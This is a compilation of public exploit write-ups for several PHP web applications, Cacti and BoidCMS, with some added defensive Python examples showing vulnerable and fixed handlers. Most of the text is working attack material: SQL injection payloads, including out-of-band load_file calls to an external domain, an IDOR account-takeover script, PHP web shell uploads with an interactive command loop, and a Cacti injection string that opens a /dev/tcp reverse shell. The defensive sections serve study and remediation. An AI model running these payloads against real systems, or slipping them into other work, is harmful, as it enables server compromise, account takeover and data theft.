<pre><code>## Title: dawa-pharma-1.0-2022 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 10/12/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P0349/best-pharmacy-billing-software-free-download<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The email parameter of the login request is vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that points at a host on an external domain. The application<br />interacted with that domain (an out-of-band lookup), which confirms<br />that the injected SQL query was executed by the database server.<br />The same injection point also answers to boolean-based and time-based<br />blind payloads (sqlmap output below), so an attacker who can only<br />reach the login form can read the application's client records from<br />the database and recover sensitive data, including credentials that<br />give access to the server.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause<br /> Payload: email=-8698' OR 5305=5305-- vvuH&password=mayurik&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\ke2v0nog1ghmfe276ddp7smbi2ovcm7aydm59vxk.tupaputka.com\\lhc'))+''<br />AND (SELECT 4515 FROM (SELECT(SLEEP(15)))KUth)--<br />VRdC&password=mayurik&login=<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/dawa-pharma-1.0-2022)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/10/dawa-pharma-10-2022-multiple-sqli.html)<br /><br />## Time spent:<br />00:37:00<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Lost and Found Information System v1.0 - IDOR leads to Account Takeover<br /># Date: 2023-12-03<br /># Exploit Author: OR4NG.M4N<br /># Category : webapps<br /># CVE : CVE-2023-38965<br /><br />Python PoC:<br /><br />import argparse<br />import requests<br />import time<br /><br />parser = argparse.ArgumentParser(description='Send a POST request to the target server')<br />parser.add_argument('-url', help='URL of the target', required=True)<br />parser.add_argument('-user', help='Username', required=True)<br />parser.add_argument('-password', help='Password', required=True)<br />args = parser.parse_args()<br /><br /># The save handler trusts the client-supplied user id and performs no<br /># authentication or ownership check, so no session cookie is needed.<br />url = args.url.rstrip('/') + '/classes/Users.php?f=save'<br /><br /># Overwrite the credentials of the user record with id=1 with values of our choosing.<br />data = {<br /> 'id': '1',<br /> 'firstname': 'or4ng',<br /> 'middlename': '',<br /> 'lastname': 'Admin',<br /> 'username': args.user,<br /> 'password': args.password<br />}<br /><br />response = requests.post(url, data=data)<br /># The handler answers "1" when the update succeeded.<br />if b"1" in response.content:<br /> print("Exploit ..")<br /> time.sleep(1)<br /> print("User :" + args.user + "\nPassword :" + args.password)<br />else:<br /> print("Exploit Failed..")<br /><br /></code></pre>
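What the PoC above exploits is a missing ownership check in the save handler. The Python below is an added illustration written for this page, not the application's PHP: `save_user_vulnerable` models the assumed behaviour of Users.php?f=save (update whichever row the request names, no login required) against a constructed two-row table, and `save_user_safe` shows the fix, deriving the target row from the server-side session and letting only an administrator edit another account. The table layout and the type codes are assumptions for the example.

```python
import sqlite3

# Constructed two-account table standing in for the application's users table.
# type 1 = administrator, type 2 = ordinary user (an assumption for the example).
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, type INTEGER)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                   [(1, "admin", "admin123", 1), (2, "alice", "alice123", 2)])
    db.commit()
    return db


class Forbidden(Exception):
    pass


def save_user_vulnerable(db, post, session=None):
    # Assumed shape of Users.php?f=save: the row to update is whichever 'id'
    # the client sends, and nothing checks that a user is logged in at all.
    db.execute("UPDATE users SET username = ?, password = ? WHERE id = ?",
               (post["username"], post["password"], int(post["id"])))
    db.commit()
    return "1"  # the PoC treats a body containing "1" as success


def save_user_safe(db, post, session=None):
    # Authentication first, then authorisation: the target row comes from the
    # server-side session, and only an administrator may name a different id.
    if not session or "user_id" not in session:
        raise Forbidden("login required")
    target = int(post.get("id", session["user_id"]))
    if target != session["user_id"] and session.get("type") != 1:
        raise Forbidden("cannot modify another user's account")
    db.execute("UPDATE users SET username = ?, password = ? WHERE id = ?",
               (post["username"], post["password"], target))
    db.commit()
    return "1"


def credentials(db, user_id):
    return db.execute("SELECT username, password FROM users WHERE id = ?",
                      (user_id,)).fetchone()
```

With the PoC's request body (`id=1`, attacker-chosen username and password), the vulnerable handler silently replaces the administrator's credentials; the hardened one refuses the request both without a session and from a non-admin session, and still lets a user change their own record.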
<pre><code># Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE<br /># Date: 07.10.2023<br /># Exploit Author: Oğulcan Hami Gül<br /># Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code<br /># Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code<br /># Version: 1.0<br /># Tested on: Windows 10<br /><br />## The user-creation form at /pms/users.php is reachable without authentication, and its profile_picture field accepts any file, so an unauthenticated attacker can upload a PHP file in place of a profile image. The request below creates a user and uploads phps.php, a minimal web shell, as the profile picture.<br /><br />curl -i -s -k -X $'POST' \<br /> -H $'Host: 192.168.1.36' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate, br' -H $'Content-Type: multipart/form-data; boundary=---------------------------11668063818537881393672984185' -H $'Origin: http://192.168.1.36' -H $'Connection: close' -H $'Referer: http://192.168.1.36/pms/users.php' -H $'Upgrade-Insecure-Requests: 1' -H $'Content-Length: 787' \<br /> --data-binary $'-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"display_name\"\x0d\x0a\x0d\x0aCannn3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"user_name\"\x0d\x0a\x0d\x0aGull3\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"password\"\x0d\x0a\x0d\x0acangul\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"profile_picture\"; filename=\"phps.php\"\x0d\x0aContent-Type: application/x-php\x0d\x0a\x0d\x0a<?php\x0a if(isset($_GET[\'cmd\']))\x0a {\x0a system($_GET[\'cmd\']);\x0a }\x0a?>\x0a\x0d\x0a-----------------------------11668063818537881393672984185\x0d\x0aContent-Disposition: form-data; name=\"save_user\"\x0d\x0a\x0d\x0a\x0d\x0a-----------------------------11668063818537881393672984185--\x0d\x0a' \<br /> $'http://192.168.1.36/pms/users.php'<br /><br /><br />## The application stores the upload under /pms/user_images/ with a number (the upload time as a Unix timestamp; 1696703526 in the example below) prepended to the original file name, but it keeps the client-supplied .php extension, and the directory is readable without authentication.<br /><br />## Requesting http://192.168.1.36/pms/user_images/1696703526phps.php?cmd=whoami therefore executes the uploaded PHP, and the attacker can run arbitrary commands on the application server.<br /><br /></code></pre>
<pre><code># Exploit Title: Smart School 6.4.1 - SQL Injection<br /># Exploit Author: CraCkEr<br /># Date: 28/09/2023<br /># Vendor: QDocs - qdocs.net<br /># Vendor Homepage: https://smart-school.in/<br /># Software Link: https://demo.smart-school.in/<br /># Tested on: Windows 10 Pro<br /># Impact: Database Access<br /># CVE: CVE-2023-5495<br /># CWE: CWE-89 - CWE-74 - CWE-707<br /><br /><br />## Greetings<br /><br />The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka<br />CryptoJob (Twitter) twitter.com/0x0CryptoJob<br /><br /><br />## Description<br /><br />SQL injection lets an attacker read or modify data in the backing database, and can<br />crash the application or make it unavailable, leading to lost revenue and damage to<br />a company's reputation. In Smart School 6.4.1 the course filter endpoint and the<br />online admission form pass request values into database queries unsanitised; all<br />of the injections found are time-based blind (MySQL SLEEP), as the sqlmap output<br />below shows. Note that the searchfield payload (1 or sleep(5)#) needs no closing<br />quote, so that value is interpolated unquoted into the query, while the title,<br />searchvalue and email payloads break out of a quoted string with 'XOR(...)XOR'.<br /><br /><br />Path: /course/filterRecords/<br /><br />POST Parameter 'searchdata[0][title]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi<br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]<br /><br />-------------------------------------------<br />POST /course/filterRecords/ HTTP/1.1<br /><br /><br />searchdata%5B0%5D%5Btitle%5D=rating&searchdata%5B0%5D%5Bsearchfield%5D=sleep(5)%23&searchdata%5B0%5D%5Bsearchvalue%5D=3<br /><br />-------------------------------------------<br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]<br /><br /><br />Path: /course/filterRecords/<br /><br /><br />POST Parameter 'searchdata[0][title]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[0][searchvalue]' is vulnerable to SQLi<br />POST Parameter 'searchdata[1][title]' is vulnerable to 
SQLi<br />POST Parameter 'searchdata[1][searchfield]' is vulnerable to SQLi<br />POST Parameter 'searchdata[1][searchvalue]' is vulnerable to SQLi<br /><br />---<br />Parameter: searchdata[0][title] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[0][searchfield] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[0][searchvalue] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[1][title] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low<br /><br />Parameter: searchdata[1][searchvalue] (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: searchdata[0][title]=Price&searchdata[0][searchfield]=1 or sleep(5)#&searchdata[0][searchvalue]=free&searchdata[1][title]=Sales&searchdata[1][searchfield]=sales&searchdata[1][searchvalue]=low'XOR(SELECT(0)FROM(SELECT(SLEEP(7)))a)XOR'Z<br 
/>---<br /><br /><br />-------------------------------------------<br />POST /course/filterRecords/ HTTP/1.1<br /><br /><br />searchdata[0][title]=[SQLi]&searchdata[0][searchfield]=[SQLi]&searchdata[0][searchvalue]=[SQLi]&searchdata[1][title]=[SQLi]&searchdata[1][searchfield]=[SQLi]&searchdata[1][searchvalue]=[SQLi]<br />-------------------------------------------<br /><br /><br /><br />Path: /online_admission<br /><br />---<br />Parameter: MULTIPART email ((custom) POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 time-based blind (query SLEEP)<br /> Payload: -----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="class_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="section_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="firstname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="lastname"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="gender"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="dob"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="mobileno"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="email"\n\n'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="file"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="father_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; 
name="mother_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_name"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_relation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_email"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_pic"; filename=""\nContent-Type: application/octet-stream\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_phone"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_occupation"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="guardian_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="current_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="permanent_address"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="adhar_no"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="samagra_id"\n\n\n-----------------------------320375734131102816923531485385\nContent-Disposition: form-data; name="previous_school"\n\n\n-----------------------------320375734131102816923531485385--<br />---<br /><br />POST Parameter 'email' is vulnerable to SQLi<br /><br />POST /online_admission HTTP/1.1<br /><br />-----------------------------320375734131102816923531485385<br />Content-Disposition: form-data; name="email"<br /><br />*[SQLi]<br />-----------------------------320375734131102816923531485385<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>## Title: gaatitrack-1.0-2023 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 08/31/2023<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.mayurik.com/source-code/P0998/best-courier-management-system-project-in-php<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br /><br />## Description:<br />The email parameter of the login request is vulnerable to SQL injection.<br />The payload '+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+'<br />was submitted in the email parameter. This payload injects a SQL<br />sub-query that calls MySQL's load_file function with a UNC file path<br />that points at a host on an external domain. The application<br />interacted with that domain (an out-of-band lookup), which confirms<br />that the injected SQL query was executed by the database server.<br />The same injection point also answers to boolean-based, error-based<br />and time-based payloads (sqlmap output below); the error-based one<br />leaks query results through the database error text the application<br />displays, so an attacker who can only reach the login form can read<br />the application's client records from the database and recover<br />sensitive data, including credentials that give access to the server.<br /><br /><br />STATUS: HIGH-CRITICAL Vulnerability<br /><br />[+]Payload:<br />```MySQL<br />---<br />Parameter: email (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />OR NOT 9478=9478-- PfLy&password=admin<br /><br /> Type: error-based<br /> Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or<br />GROUP BY clause (FLOOR)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />OR (SELECT 9464 FROM(SELECT COUNT(*),CONCAT(0x7176767071,(SELECT<br />(ELT(9464=9464,1))),0x7162626b71,FLOOR(RAND(0)*2))x FROM<br />INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- QTps&password=admin<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: email=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\v1xhdo8vwaoytlogdhfl6galdcj57vvmyaqxgl5.tupaputka.com\\ffm'))+''<br />AND (SELECT 4385 FROM (SELECT(SLEEP(15)))AHWF)-- CATW&password=admin<br />---<br />```<br /><br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/gaatitrack-1.0-2023)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2023/10/gaatitrack-10-2023-multiple-sqli.html)<br /><br />## Time spent:<br />01:10:00<br /><br /><br /></code></pre>
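The three SQL-injection listings above (dawa-pharma, Smart School and gaatitrack) share one root cause: request values pasted into the query text. The Python below is an added example written for this page, not the vendors' PHP code; it uses SQLite in place of MySQL, a constructed two-table schema, and query shapes that are assumptions about what the applications build. `login_vulnerable` shows the boolean-based payload from the mayurik listings bypassing a login, and `filter_vulnerable` shows why a value like `1 or sleep(5)#` in Smart School's searchfield parameter works without a closing quote: the parameter is spliced into the query unquoted, in a position that placeholders cannot protect, so the fix there is an allow-list rather than a bound parameter.

```python
import sqlite3

# Constructed demo schema (not the vendors' database): a login table and a
# table that the search/filter endpoint queries.  SQLite stands in for MySQL.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, email TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'mayuri.infospace@gmail.com', 'mayurik')")
    db.execute("CREATE TABLE courses (id INTEGER, title TEXT, price INTEGER)")
    db.executemany("INSERT INTO courses VALUES (?, ?, ?)",
                   [(1, "Algebra", 0), (2, "Physics", 50)])
    db.commit()
    return db


# --- sink 1: a value position (the mayurik login forms) -------------------

def login_vulnerable(db, email, password):
    # Assumed vulnerable shape: POST values concatenated into the SQL text.
    # email = "-8698' OR 5305=5305-- x" closes the string, adds an always-true
    # OR, and comments out the password check.
    sql = ("SELECT id FROM users WHERE email = '" + email
           + "' AND password = '" + password + "'")
    return db.execute(sql).fetchone() is not None


def login_safe(db, email, password):
    # Placeholders: the driver sends the values separately from the query
    # text, so quotes and comment markers in them are just data.
    sql = "SELECT id FROM users WHERE email = ? AND password = ?"
    return db.execute(sql, (email, password)).fetchone() is not None


# --- sink 2: an identifier position (Smart School's searchfield) ----------

def filter_vulnerable(db, field, value):
    # Assumed vulnerable shape: the column to filter on comes from the request.
    # The value is bound safely, yet field = "1=1 OR title" still returns every
    # row; on MySQL the same slot takes "1 or sleep(5)#" for a timing oracle.
    sql = f"SELECT id, title FROM courses WHERE {field} = ? ORDER BY id"
    return db.execute(sql, (value,)).fetchall()


FILTERABLE_COLUMNS = {"title", "price"}


def filter_safe(db, field, value):
    # A column name cannot be a bound parameter, so it must be validated
    # against a fixed allow-list before it touches the SQL text.
    if field not in FILTERABLE_COLUMNS:
        raise ValueError(f"unknown filter column: {field!r}")
    sql = f"SELECT id, title FROM courses WHERE {field} = ? ORDER BY id"
    return db.execute(sql, (value,)).fetchall()
```

The two sinks need different fixes: a value slot is solved by placeholders, an identifier slot (column, table, ORDER BY direction) only by an allow-list of the names the application itself defines. The time-based payloads on this page are just a way of reading the result of such a query one bit at a time when nothing is echoed back; the injection point is the same.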
<pre><code># Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options<br /># Date: 2023-07-03<br /># Exploit Author: Antonio Francesco Sardella<br /># Vendor Homepage: https://www.cacti.net/<br /># Software Link: https://www.cacti.net/info/downloads<br /># Version: Cacti 1.2.24<br /># Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container<br /># CVE: CVE-2023-39362<br /># Category: WebApps<br /># Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp<br /># Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application<br /># Vulnerability discovered and reported by: Antonio Francesco Sardella<br /><br />=======================================================================================<br />Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)<br />=======================================================================================<br /><br />-----------------<br />Executive Summary<br />-----------------<br /><br />In Cacti 1.2.24, under certain conditions, an authenticated privileged user can use a malicious string in the SNMP options of a Device to perform command injection and obtain remote code execution on the underlying server.<br /><br />-------<br />Exploit<br />-------<br /><br />Prerequisites:<br /> - The attacker is authenticated.<br /> - The attacker's privileges allow them to manage Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".<br /> - A Device that supports SNMP can be used.<br /> - Net-SNMP Graphs can be used.<br /> - The PHP snmp extension is not installed (without it, Cacti falls back to invoking the Net-SNMP command-line tools, which is how the injected string reaches a shell).<br /><br />Example of an exploit:<br /> - Go to "Console" > "Create" > "New Device".<br /> - Create a Device that supports SNMP version 1 or 2.<br /> - Ensure that the Device has Graphs with one or more templates of:<br /> - "Net-SNMP - Combined SCSI Disk Bytes"<br /> - "Net-SNMP - Combined SCSI Disk 
I/O"<br /> - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)<br /> - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:<br /> public\' ; touch /tmp/m3ssap0 ; \'<br /> - Click the "Create" button.<br /> - Check that the file has been created under /tmp.<br /><br />To obtain a reverse shell, a payload like the following can be used.<br /><br /> public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'<br /><br />A similar exploit works by editing an existing Device, with the same prerequisites, and waiting for the poller to run. It may be necessary to change the "Downed Device Detection" field under the "Availability/Reachability Options" section to a method that does not involve SNMP, because the malicious payload can break the SNMP interaction with the host.<br /><br />----------<br />Root Cause<br />----------<br /><br />A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).<br /><br />----------<br />References<br />----------<br /><br /> - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp<br /> - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html<br /> - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application<br /><br /><br /></code></pre>
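The payload above works because the community string ends up inside a single-quoted argument of a command line that is handed to a shell, and the quote inside the value terminates that argument. The Python below is an added example written for this page, not Cacti's code: `echo` stands in for the Net-SNMP binary so the shell's treatment of the value is visible in the output, the vulnerable and safe command builders are assumed shapes, and the string used is the page's payload with its backslash escapes removed, i.e. the text the shell ultimately has to parse (the exact path it takes through Cacti's quoting is in the linked advisory).

```python
import shlex
import shutil
import subprocess

# 'echo' stands in for the Net-SNMP binary so the shell's handling of the
# community string is visible in the output instead of in an SNMP query.
TOOL = "echo"

# The page's payload with the backslash escapes removed, i.e. the text the
# shell has to parse once the application has wrapped it in single quotes.
PAYLOAD = "public' ; echo INJECTED ; '"


def build_cmdline_vulnerable(community, host):
    # Assumed vulnerable shape: quotes added by string concatenation, whole
    # line handed to /bin/sh.  The quote inside the value ends the argument,
    # and "; echo INJECTED ;" becomes a second command.
    return f"{TOOL} -v2c -c '{community}' {host}"


def build_cmdline_safe(community, host):
    # shlex.quote rewrites every embedded ' as '"'"' so the shell sees one word.
    return f"{TOOL} -v2c -c {shlex.quote(community)} {shlex.quote(host)}"


def run_vulnerable(community, host):
    result = subprocess.run(build_cmdline_vulnerable(community, host),
                            shell=True, capture_output=True, text=True)
    return result.stdout.splitlines()


def run_safe(community, host):
    # Preferred fix: no shell at all.  The argv list goes straight to
    # execve(), so the value can only ever be one argument.
    result = subprocess.run([TOOL, "-v2c", "-c", community, host],
                            capture_output=True, text=True)
    return result.stdout.splitlines()


def shell_available():
    return shutil.which("sh") is not None and shutil.which(TOOL) is not None
```

Run through the shell, the vulnerable line prints `-v2c -c public` and then a separate `INJECTED` line, proof that the second command executed; the argv form prints the whole community string, quotes and semicolons included, as one argument and never starts a second process. Quoting with `shlex.quote` is the fallback for code that cannot avoid the shell, but passing an argument list is the fix to prefer.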
<pre><code>#!/usr/bin/python3<br /># Exploit Title: BoidCMS v2.0.0 - authenticated file upload vulnerability<br /># Date: 08/21/2023<br /># Exploit Author: 1337kid<br /># Vendor Homepage: https://boidcms.github.io/#/<br /># Software Link: https://boidcms.github.io/BoidCMS.zip<br /># Version: <= 2.0.0<br /># Tested on: Ubuntu<br /># CVE : CVE-2023-38836<br /><br />import requests<br />import re<br />import argparse<br /><br />parser = argparse.ArgumentParser(description='Exploit for CVE-2023-38836')<br />parser.add_argument("-u", "--url", help="website url", required=True)<br />parser.add_argument("-l", "--user", help="admin username", required=True)<br />parser.add_argument("-p", "--passwd", help="admin password", required=True)<br />args = parser.parse_args()<br />base_url=args.url.rstrip('/')<br />user=args.user<br />passwd=args.passwd<br /><br /># Every admin form carries a 64-character CSRF token; pull the first one from the page.<br />def get_token(html):<br /> m=re.search('[a-z0-9]{64}',html)<br /> if not m:<br />  print("CSRF token not found")<br />  exit()<br /> return m.group(0)<br /><br />with requests.Session() as s:<br /> req=s.get(f'{base_url}/admin')<br /> form_login_data={<br />  "username":user,<br />  "password":passwd,<br />  "login":"Login",<br />  "token":get_token(req.text),<br /> }<br /> s.post(f'{base_url}/admin',data=form_login_data)<br /> #=========== File upload to RCE<br /> req=s.get(f'{base_url}/admin?page=media')<br /> form_upld_data={<br />  "token":get_token(req.text),<br />  "upload":"Upload"<br /> }<br /> #==== php shell: a GIF header satisfies the image check, the rest is PHP<br /> php_code=b'GIF89a;\n<?php system($_GET["cmd"]) ?>'<br /> file = {'file' : ('shell.php', php_code)}<br /> s.post(f'{base_url}/admin?page=media',files=file,data=form_upld_data)<br /> req=s.get(f'{base_url}/media/shell.php')<br /> if req.status_code == 404:<br />  print("Upload failed")<br />  exit()<br /> print(f'Shell uploaded to "{base_url}/media/shell.php"')<br /> while True:<br />  cmd=input("cmd >> ")<br />  if cmd=='exit': exit()<br />  req=s.get(f'{base_url}/media/shell.php',params = {"cmd": cmd})<br />  print(req.text)<br /><br /></code></pre>
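Both upload-to-RCE listings on this page (the Clinic's Patient Management System profile picture and the BoidCMS media upload) come down to the same two mistakes: the server keeps the attacker's file extension, and it judges the content, if at all, by a header the attacker controls (the GIF89a prefix in the BoidCMS exploit). The Python below is an added example, not code from either project. `store_vulnerable` models the prefix-and-keep-extension behaviour described for the PMS, and `validate_image_upload` is one hardened version: extension allow-list, magic-byte check for the declared type, rejection of embedded PHP tags, and a random server-side name. The magic-byte table and the sample payloads are constructed for the example.

```python
import os
import re
import secrets

# Extension -> leading bytes the file must actually start with.
ALLOWED_IMAGE_TYPES = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",          # GIF87a / GIF89a
}
PHP_OPEN_TAG = re.compile(rb"<\?(php\b|=)", re.IGNORECASE)


class UploadRejected(ValueError):
    pass


def store_vulnerable(client_filename, now):
    # Assumed model of the PMS behaviour: a number (the upload time) is
    # prepended, but the name and extension chosen by the client survive,
    # so phps.php is still handed to the PHP interpreter when requested.
    return f"{now}{client_filename}"


def validate_image_upload(client_filename, content):
    """Return a safe server-side filename for the upload or raise UploadRejected."""
    ext = os.path.splitext(client_filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_IMAGE_TYPES:
        raise UploadRejected(f"extension {ext!r} is not an allowed image type")
    # The declared type and the bytes must agree; a .png whose body is a GIF fails here.
    if not content.startswith(ALLOWED_IMAGE_TYPES[ext]):
        raise UploadRejected("file content does not match its extension")
    # A valid image header followed by PHP is a polyglot; refuse it outright
    # rather than rely on the web server never executing this directory.
    if PHP_OPEN_TAG.search(content):
        raise UploadRejected("embedded PHP open tag")
    # Never reuse the client-supplied name: random name, allow-listed extension.
    return f"{secrets.token_hex(16)}.{ext}"
```

The validator is only one layer: the upload directory should additionally have script execution disabled (or live outside the web root and be served through a download handler), and the endpoint must require authentication, which was the PMS's first failure before the upload check was ever reached.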
